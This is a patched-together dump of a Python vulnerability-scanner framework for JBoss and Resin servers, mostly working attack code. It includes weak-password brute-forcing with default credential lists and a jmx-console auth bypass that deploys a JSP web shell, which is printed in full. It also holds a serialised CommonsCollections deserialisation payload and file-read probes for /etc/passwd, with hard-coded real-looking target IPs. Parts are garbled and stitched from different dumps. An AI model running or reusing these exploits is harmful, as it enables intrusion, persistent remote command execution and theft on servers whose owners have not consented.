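        hackinfo    -- spare field
        """
        return True

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Non-intrusive check hook; the base reports nothing found."""
        return {'result': False}

    def attack(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Exploitation hook; the base reports nothing found."""
        return {'result': False}

    def parse_output(self, result):
        """Post-processing hook; the base ignores ``result`` and reports nothing found."""
        return {'result': False}


# --------------------------------------------------------------------------
# /middileware/jboss/__init__.py
# --------------------------------------------------------------------------
KEYWORDS = ['jboss', ]


def rules(head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
    """Fingerprint JBoss from the page body, the headers or the spare ``hackinfo`` field."""
    return ('youcandoit.jpg' in context or 'JBossWeb' in context
            or 'jboss' in hackinfo or 'jboss' in head)


# --------------------------------------------------------------------------
# /middileware/jboss/jboss_crackpass.py
# --------------------------------------------------------------------------
#coding:utf-8
from t import T
import base64
import re
import urllib
import urllib2
import time, random


class P(T):
    """JBoss default / weak credentials on jmx-console, the web console and admin-console."""

    def __init__(self):
        T.__init__(self)

    def _basic_auth_get(self, login_url, user, password, timeout):
        """GET ``login_url`` with HTTP Basic credentials and return ``(status, body)``.

        An HTTPError is a valid answer here (401 for a wrong guess) and is
        returned as its code and body; URLError and anything else propagate.
        """
        request = urllib2.Request(login_url)
        auth_str = base64.b64encode(user + ':' + password)
        request.add_header('Authorization', 'Basic ' + auth_str)
        res = None
        try:
            res = urllib2.urlopen(request, timeout=timeout)
            return res.code, res.read()
        except urllib2.HTTPError, e:
            return e.code, e.read()
        finally:
            if res is not None:
                res.close()

    def _crack_basic_auth(self, login_url, user_list, pass_list, flag_list, timeout):
        """Try every user/password pair against one Basic-auth console.

        Returns ``(info, give_up)``. ``info`` is the finding text on a hit
        (None otherwise). ``give_up`` is True once ``self._error_i`` -- the
        URLError count shared by the whole verify() run -- reaches 3. A 404
        means the console is not deployed, so the remaining guesses for it
        are skipped.
        """
        for user in user_list:
            for password in pass_list:
                try:
                    res_code, res_html = self._basic_auth_get(login_url, user, password, timeout)
                except urllib2.URLError:
                    self._error_i += 1
                    if self._error_i >= 3:
                        return None, True
                    continue
                except Exception:
                    break
                if int(res_code) == 404:
                    return None, False
                if int(res_code) == 401:
                    continue
                for flag in flag_list:
                    if flag in res_html:
                        return '%s Jboss Weak password %s:%s' % (login_url, user, password), False
        return None, False

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Guess credentials on ``/jmx-console``, ``/console/App.html`` and ``/admin-console/login.seam``.

        The first two use HTTP Basic auth; the Seam console is a form login
        that needs the ``javax.faces.ViewState`` value from a prior GET.
        Returns the framework result dict on the first hit.
        """
        timeout = 10
        target_url = 'http://' + ip + ':' + port
        result = {'result': False}
        self._error_i = 0
        flag_list = ['>jboss.j2ee', 'JBoss JMX Management Console', 'HtmlAdaptor?action=displayMBeans', 'JBoss Management']
        user_list = ['admin', 'manager', 'jboss', 'root']
        pass_list = ['', 'admin', '123456', '12345678', '123456789', 'admin123', 'admin888', 'password', 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root', 'jboss']

        for path in ('/jmx-console', '/console/App.html'):
            info, give_up = self._crack_basic_auth(target_url + path, user_list, pass_list, flag_list, timeout)
            if give_up:
                return result
            if info:
                # BUG FIX: on a jmx-console hit the original called an undefined
                # ``run(...)`` (and rebound the ``re`` module with its result),
                # so every real finding died with NameError. That follow-up step
                # is not part of this module and has been dropped.
                result['result'] = True
                result['VerifyInfo'] = {}
                result['VerifyInfo']['type'] = 'Jboss Weak password'
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['payload'] = target_url + path
                result['VerifyInfo']['result'] = info
                return result

        login_url = target_url + '/admin-console/login.seam'
        for user in user_list:
            for password in pass_list:
                res = None
                try:
                    # BUG FIX: this GET ran without a timeout and its handle was
                    # overwritten by the POST response without being closed.
                    res = urllib2.urlopen(login_url, timeout=timeout)
                    res_html = res.read()
                    res.close()
                    res = None
                    if '"http://jboss.org/embjopr/"' not in res_html:
                        continue
                    key_str = re.search('javax.faces.ViewState\" value=\"(.*?)\"', res_html)
                    # BUG FIX: a page without a ViewState used to raise on None.
                    if key_str is None:
                        return result
                    key_hash = urllib.quote(key_str.group(1))
                    PostStr = "login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login&javax.faces.ViewState=%s" % (user, password, key_hash)
                    request = urllib2.Request(login_url, PostStr)
                    res = urllib2.urlopen(request, timeout=timeout)
                    if 'admin-console/secure/summary.seam' in res.read():
                        info = "%s Jboss Weak password %s:%s" % (login_url, user, password)
                        result['result'] = True
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['type'] = 'Jboss Weak password'
                        result['VerifyInfo']['URL'] = target_url
                        result['VerifyInfo']['payload'] = target_url + '/admin-console/login.seam'
                        result['VerifyInfo']['result'] = info
                        # Stop at the first valid login instead of guessing on.
                        return result
                except Exception:
                    return result
                finally:
                    if res is not None:
                        res.close()
        return result


if __name__ == '__main__':
    print P().verify(ip='1.202.235.69', port='8080')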
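# --------------------------------------------------------------------------
# /middileware/jboss/jboss_head_getshell.py
# --------------------------------------------------------------------------
#coding:utf-8
from t import T
import urllib2
import socket
import time
import random


def random_str(len):
    """Return ``len`` random characters from ``ABCDEFGH`` (used as the WAR name)."""
    return ''.join(random.choice("ABCDEFGH") for _ in range(len))


def readfile(path):
    """Read ``path`` in text mode, closing the handle on any outcome."""
    with open(path) as file_object:
        return file_object.read()


class P(T):
    """JBoss jmx-console auth bypass via HEAD to ``DeploymentFileRepository.store``.

    WARNING -- intrusive and persistent: a successful run deploys
    ``<random>.war`` containing ``auto700.jsp`` (the command-execution page
    in ``shell.jsp`` next to this file) on the target and leaves it there.
    Nothing here removes it afterwards; run only with authorisation and
    remove the deployed WAR by hand.
    """

    def __init__(self):
        T.__init__(self)

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Deploy the JSP through a raw HEAD request, wait, then fetch it to confirm.

        Returns the framework result dict; ``VerifyInfo['payload']`` is the
        URL of the deployed web shell. Errors are printed and yield a
        negative result.
        """
        timeout = 3
        target_url = 'http://' + ip + ':' + port
        result = {'result': False}
        res = None
        s1 = None
        try:
            # NOTE: setdefaulttimeout is process-wide and affects every other module.
            socket.setdefaulttimeout(timeout)
            s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s1.connect((ip, int(port)))
            import os
            shell = readfile(os.path.split(os.path.realpath(__file__))[0] + '/shell.jsp')
            # Percent-encode every byte of the JSP for the query string.
            # BUG FIX: the original used hex(ord(v)).replace("0x", "%"), which
            # yields single-digit escapes such as "%a" for bytes below 0x10
            # (newline, tab) -- invalid encoding that corrupts the deployed file.
            shellcode = ''.join('%%%02x' % ord(v) for v in shell)
            name = random_str(5)
            # The first part carries literal %3A / %3D and must stay out of the
            # %-formatting; only the argument part is formatted with the name.
            head_part = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType="
            args_part = "java.lang.String&arg0=%s.war&argType=java.lang.String&arg1=auto700&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=" % (name)
            flag = head_part + args_part + shellcode + "&argType=boolean&arg4=True HTTP/1.0\r\n\r\n"
            s1.send(flag)
            s1.recv(512)
            s1.close()
            s1 = None
            # Give the deployment scanner time to pick up the new WAR.
            time.sleep(10)
            url = "http://%s:%d" % (ip, int(port))
            webshell_url = "%s/%s/auto700.jsp" % (url, name)
            res = urllib2.urlopen(webshell_url, timeout=timeout)
            if 'comments' in res.read():
                info = "Jboss Authentication bypass webshell:%s" % (webshell_url)
                result['result'] = True
                result['VerifyInfo'] = {}
                result['VerifyInfo']['type'] = 'Jboss Authentication bypass webshell'
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['payload'] = webshell_url
                result['VerifyInfo']['result'] = info
        except Exception, e:
            print e
        finally:
            if res is not None:
                res.close()
            # BUG FIX: the original wrote ``s1.close`` without parentheses, so the
            # socket was never closed on the error path.
            if s1 is not None:
                s1.close()
        return result


if __name__ == '__main__':
    print P().verify(ip='1.202.164.105', port='8080')


# --------------------------------------------------------------------------
# /middileware/jboss/jboss_info.py
# --------------------------------------------------------------------------
#coding:utf-8
import urllib2

from t import T


class P(T):
    """JBoss / Tomcat ``/status?full=true`` page reachable without authentication."""

    def __init__(self):
        T.__init__(self)

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Fetch ``/status?full=true`` and look for the ``Max processing time`` marker.

        Returns the framework result dict; any network error yields a
        negative result.
        """
        timeout = 3
        target_url = 'http://' + ip + ':' + port
        vul_url = target_url + '/status?full=true'
        result = {'result': False}
        res = None
        try:
            res = urllib2.urlopen(vul_url, timeout=timeout)
            res_html = res.read()
        except Exception:
            return result
        finally:
            if res is not None:
                res.close()
        if "Max processing time" in res_html:
            info = vul_url + " Jboss Information Disclosure"
            result['result'] = True
            result['VerifyInfo'] = {}
            result['VerifyInfo']['type'] = 'Jboss Information Disclosure'
            result['VerifyInfo']['URL'] = target_url
            result['VerifyInfo']['payload'] = vul_url
            result['VerifyInfo']['result'] = info
        return result


if __name__ == '__main__':
    print P().verify(ip='1.202.164.105', port='8080')


# --------------------------------------------------------------------------
# /middileware/jboss/jboss_unrce.py
# --------------------------------------------------------------------------
#coding:utf-8

import urllib2
import binascii
import time


from t import T


def readfile(path):
    """Read ``path`` as bytes, closing the handle on any outcome."""
    with open(path, 'rb') as file_object:
        return file_object.read()


class P(T):
    """JBoss ``/invoker/JMXInvokerServlet`` Java deserialisation check.

    WARNING -- intrusive: ``upload.jar`` (shipped next to this file) is
    POSTed to the invoker and is processed by the target's deserialiser
    before ``vultest.dat`` -- a serialised CommonsCollections
    TransformedMap/ChainedTransformer gadget chain -- is sent and the
    ``vultest11111`` marker is looked for. What ``upload.jar`` leaves on the
    target is not visible from this module; treat it as a persistent
    artefact and clean up after use.
    """

    def __init__(self):
        T.__init__(self)

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """POST the two payload files to the invoker and check the second response.

        Returns the framework result dict; any error yields a negative result.
        """
        timeout = 3
        target_url = 'http://' + ip + ':' + port
        vul_url = target_url + "/invoker/JMXInvokerServlet"
        result = {'result': False}
        import os
        here = os.path.split(os.path.realpath(__file__))[0]
        upload_jar = readfile(here + '/upload.jar')
        vul_test = readfile(here + '/vultest.dat')
        first = None
        res = None
        try:
            # BUG FIX: both requests ran without a timeout (a stalled target hung
            # the scanner) and the first response was never closed.
            first = urllib2.urlopen(vul_url, upload_jar, timeout=timeout)
            res = urllib2.urlopen(vul_url, vul_test, timeout=timeout)
            if 'vultest11111' in res.read():
                info = vul_url + " Jboss Unserialization vul"
                result['result'] = True
                result['VerifyInfo'] = {}
                result['VerifyInfo']['type'] = 'Jboss Unserialization vul'
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['payload'] = vul_url
                result['VerifyInfo']['result'] = info
        except Exception, e:
            pass
        finally:
            for handle in (first, res):
                if handle is not None:
                    handle.close()
        return result


if __name__ == '__main__':
    print P().verify(ip='1.202.164.105', port='8080')


# --------------------------------------------------------------------------
# /middileware/jboss/shell.jsp
# (JSP command-execution page deployed by jboss_head_getshell.py; the
#  NAME="comments" form is the marker that module checks for. Reproduced
#  unchanged, with line breaks restored.)
# --------------------------------------------------------------------------
<%@ page import="java.util.*,java.io.*"%>
<% %>
<HTML><BODY>
<FORM METHOD="GET" NAME="comments" ACTION="">
<INPUT TYPE="text" NAME="comment">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("comment") != null) {
    out.println("Command: " + request.getParameter("comment") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("comment"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>


# --------------------------------------------------------------------------
# /middileware/jboss/t.py
# --------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8


class T(object):
    """Base class for every PoC module; the framework calls the hooks below."""

    def __init__(self):
        self.result = {
            'type': None,
            'version': None,
        }
        self.keywords = []
        self.versions = []

    def match_rule(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo='', **kw):
        """Decide whether this PoC applies to the target; the base always says yes.

        head        -- response headers of the probe request
        context     -- response body (HTML) of the probe request
        ip / port   -- target address
        productname -- component / product identified for the target
        keywords    -- component keywords known so far
        hackinfo    -- spare field
        """
        return True

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Non-intrusive check hook; the base reports nothing found."""
        return {'result': False}

    def attack(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Exploitation hook; the base reports nothing found."""
        return {'result': False}

    def parse_output(self, result):
        """Post-processing hook; the base ignores ``result`` and reports nothing found."""
        return {'result': False}


# --------------------------------------------------------------------------
# /middileware/jboss/vultest.dat:
# --------------------------------------------------------------------------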
\xAC\xED\x00\x05\x73\x72\x00\x32\x73\x75\x6E\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x61\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x2E\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x55\xCA\xF5\x0F\x15\xCB\x7E\xA5\x02\x00\x02\x4C\x00\x0C\x6D\x65\x6D\x62\x65\x72\x56\x61\x6C\x75\x65\x73\x74\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B\x4C\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x78\x70\x73\x72\x00\x31\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x64\x4D\x61\x70\x61\x77\x3F\xE0\x5D\xF1\x5A\x70\x03\x00\x02\x4C\x00\x0E\x6B\x65\x79\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x4C\x00\x10\x76\x61\x6C\x75\x65\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x71\x00\x7E\x00\x05\x78\x70\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x06\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61
\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69\x43\x6F\x6E\x73\x74\x61\x6E\x74\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x78\x70\x76\x72\x00\x17\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x43\x6C\x61\x73\x73\x4C\x6F\x61\x64\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0B\x6E\x65\x77\x49\x6E\x73\x74\x61\x6E\x63\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A\x99\x02\x00\x00\x78\x70\x00\x00\x00\x01\x76\x72\x00\x0F\x5B\x4C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x3B\x52\x51\xFD\x24\xC5\x1B\x68\xCD\x02\x00\x00\x78\x70\x74\x00\x09\x67\x65\x74\x4D\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x19\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7E\x00
\x19\x73\x71\x00\x7E\x00\x11\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x02\x70\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x01\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01\x73\x72\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x96\x25\x37\x36\x1A\xFC\xE4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6F\x64\x65\x49\x00\x04\x70\x6F\x72\x74\x4C\x00\x09\x61\x75\x74\x68\x6F\x72\x69\x74\x79\x71\x00\x7E\x00\x13\x4C\x00\x04\x66\x69\x6C\x65\x71\x00\x7E\x00\x13\x4C\x00\x04\x68\x6F\x73\x74\x71\x00\x7E\x00\x13\x4C\x00\x08\x70\x72\x6F\x74\x6F\x63\x6F\x6C\x71\x00\x7E\x00\x13\x4C\x00\x03\x72\x65\x66\x71\x00\x7E\x00\x13\x78\x70\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x70\x74\x00\x0B\x75\x74\x69\x6C\x32\x33\x33\x2E\x6A\x61\x72\x74\x00\x00\x74\x00\x04\x66\x69\x6C\x65\x70\x78\x74\x00\x06\x69\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x19\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7E\x00\x16\x73\x71\x00\x7E\x00\x11\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x01\x74\x00\x10\x6A\x63\x2E\x75\x74\x69\x6C\x2E\x43\x6F\x6D\x6D\x55\x74\x69\x6C\x74\x00\x09\x6C\x6F\x61\x64\x43\x6C\x61\x73\x73\x75\x71\x00\x7E\x00\x19\x00\x00\x00\x01\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x11\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x02\x74\x00\x04\x6D\x61\x69\x6E\x75\x71\x00\x7E\x00\x19\x00\x00\x00\x01\x76\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x71\x00\x7E\x00\x1D\x75\x71\x00\x7E\x00\x19\x00\x00\x00\x02\x71\x00\x7E\x00\x20\x71\x00\x7E\x00\x21\x73\x71\x00\x7E\x00\x11\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x02\x70\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x01\x75\x71\x00\x7E\x00\x39\x00\x00\x00\x04\x74\x00\x04\x64\x61\x74\x61\x74\x00\x07\x2D\x61\x63\x74\x69\x6F\x6E\x74\x00\x06\x72\x75\x6E\x63\x6D\x64\x74\x00\x12\x65\x63\x68\x6F\x20\x76\x75\x6C\x74\x65\x73\x74\x31\x31\x31\x31\x31\x71\x71\x00\x7E\x00\x2B\x75\x71\x00\x7E\x00\x19\x00\x00\x00
def rules(head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
    """Fingerprint hook for the resin package.

    No content-based rule is defined for Resin, so the hook always
    declines; selection of this package rests on ``KEYWORDS`` alone.
    Every parameter is accepted only for interface parity with the other
    ``rules`` functions and is ignored.
    """
    matched = False
    return matched
opener.open(target_url+'/resin-admin/j_security_check?j_uri=index.php',PostStr) 29 | res_html = res.read() 30 | res_code = res.code 31 | except urllib2.HTTPError,e: 32 | return result 33 | except urllib2.URLError,e: 34 | error_i+=1 35 | if error_i >= 3: 36 | return result 37 | continue 38 | except: 39 | 40 | return result 41 | finally: 42 | if res is not None: 43 | res.close() 44 | del res 45 | for flag in flag_list: 46 | if flag in res_html or int(res_code) == 408: 47 | info = '%s/resin-admin Resin Weak password %s:%s'%(target_url,user,password) 48 | result['result']=True 49 | result['VerifyInfo'] = {} 50 | result['VerifyInfo']['type']='Resin Weak password' 51 | result['VerifyInfo']['URL'] =target_url 52 | result['VerifyInfo']['payload']=target_url+'/resin-admin' 53 | result['VerifyInfo']['result'] =info 54 | return result 55 | return result 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | if __name__ == '__main__': 66 | print P().verify(ip='1.202.164.105',port='8080') -------------------------------------------------------------------------------- /middileware/resin/resin_fileread.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import urllib2 3 | 4 | 5 | from t import T 6 | 7 | 8 | 9 | 10 | class P(T): 11 | def __init__(self): 12 | T.__init__(self) 13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 14 | timeout=3 15 | target_url = 'http://'+ip+':'+port 16 | result = {} 17 | res=None 18 | result['result']=False 19 | vul_url = target_url + "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd" 20 | try: 21 | res=urllib2.urlopen(vul_url,timeout=timeout) 22 | res_html = res.read() 23 | except: 24 | return result 25 | finally: 26 | if res is not None: 27 | res.close() 28 | del res 29 | if "root:" in res_html: 30 | info = vul_url + " Resin File Read Vul" 31 | result['result']=True 32 | result['VerifyInfo'] = {} 33 | 
class P(T):
    """Resin documentation-webapp file read check.

    The probe requests ``/resin-doc/viewfile/`` with a ``file`` parameter
    naming ``WEB-INF/web.xml`` and reports a finding when the response body
    contains the text ``xml version``. The exposure therefore hinges on the
    ``resin-doc`` webapp being served by the target; not deploying it on
    production hosts removes the endpoint this check relies on.
    """
    def __init__(self):
        # No state beyond what the T base class sets up.
        T.__init__(self)
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Probe ``http://ip:port`` for the resin-doc viewfile disclosure.

        Only ``ip`` and ``port`` are used; the other parameters exist for
        interface parity with ``T.verify`` and are ignored.

        Returns:
            A dict with ``'result'`` (bool). When True it also carries a
            ``'VerifyInfo'`` dict with ``type``, ``URL``, ``payload`` and
            ``result`` describing the finding. Any network or HTTP failure
            yields ``{'result': False}`` instead of an exception.
        """
        timeout=3
        target_url = 'http://'+ip+':'+port
        result = {}
        res=None
        result['result']=False
        vul_url = target_url + "/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml"
        try:
            res=urllib2.urlopen(vul_url,timeout=timeout)
            res_html = res.read()
        except:
            # NOTE(review): a bare except also swallows KeyboardInterrupt and
            # SystemExit; urllib2.URLError (and presumably socket.timeout) is
            # the intended set. Every failure is reported as "not found".
            return result
        finally:
            # Release the connection whether or not the read succeeded.
            if res is not None:
                res.close()
                del res
        # Detection is a loose substring match on the XML declaration, so any
        # XML-looking page served at this path would also count as a hit.
        if "xml version" in res_html:
            info = vul_url + " Resin File Read Vul"
            result['result']=True
            result['VerifyInfo'] = {}
            result['VerifyInfo']['type']='Resin File Read Vul'
            result['VerifyInfo']['URL'] =target_url
            result['VerifyInfo']['payload']=vul_url
            result['VerifyInfo']['result'] =info
            return result
        return result
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Probe ``http://ip:port`` for the Resin directory-browsing issue.

        The request path is a URL-encoded space followed by a parent-directory
        step into ``web-inf``; a finding is reported when the response body
        contains ``<h1>Directory of``, i.e. the server rendered a directory
        listing instead of refusing the request. The info string labels this
        as CVE-2007-2440. Only ``ip`` and ``port`` are used; the remaining
        parameters exist for interface parity with ``T.verify``.

        Returns:
            A dict with ``'result'`` (bool) and, on a hit, a ``'VerifyInfo'``
            dict holding ``type``, ``URL``, ``payload`` and ``result``. Any
            network or HTTP failure yields ``{'result': False}``.
        """
        timeout=3
        target_url = 'http://'+ip+':'+port
        result = {}
        res=None
        result['result']=False
        vul_url = target_url + '/%20..\\web-inf'
        try:
            res=urllib2.urlopen(vul_url,timeout=timeout)
            res_html = res.read()
        except:
            # NOTE(review): bare except also catches KeyboardInterrupt and
            # SystemExit; urllib2.URLError is presumably what is meant. All
            # failures collapse into a negative result.
            return result
        finally:
            # Close the response regardless of how the read ended.
            if res is not None:
                res.close()
                del res
        # Substring match on the listing heading; the type label reuses the
        # generic "Resin File Read Vul" string rather than naming the CVE.
        if "<h1>Directory of" in res_html:
            info = vul_url + " Resin File Read And Directory Browsing Vul CVE:2007-2440"
            result['result']=True
            result['VerifyInfo'] = {}
            result['VerifyInfo']['type']='Resin File Read Vul'
            result['VerifyInfo']['URL'] =target_url
            result['VerifyInfo']['payload']=vul_url
            result['VerifyInfo']['result'] =info
            return result
        return result
class T(object):
    """Base class that every PoC module subclasses as ``P``.

    It owns the shared result/keyword/version attributes and supplies
    no-op default implementations of the plugin hooks. Subclasses
    override ``verify`` (and sometimes ``attack``); the defaults below
    always report "nothing found".
    """

    def __init__(self):
        # Per-instance state shared by all plugins.
        self.result = dict(type=None, version=None)
        self.keywords = list()
        self.versions = list()

    def match_rule(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo='', **kw):
        """Decide whether this plugin applies to the probed host.

        Args:
            head: response headers of the probe request
            context: response body (HTML) of the probe request
            ip: target IP address
            port: target port
            productname: product/component information for the request
                (the mutable default is never modified here)
            keywords: currently known keyword components
            hackinfo: spare field
            **kw: extra keyword arguments, ignored

        Returns:
            Always True in the base class.
        """
        return True

    def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Default verification hook; reports no finding."""
        return self._negative()

    def attack(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
        """Default attack hook; reports no finding."""
        return self._negative()

    def parse_output(self, result):
        """Default output hook; the argument is ignored and a negative result returned."""
        return self._negative()

    @staticmethod
    def _negative():
        """Build the result dict that means "not vulnerable"."""
        return {'result': False}
def rules(head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''):
    """Fingerprint hook for the tomcat package.

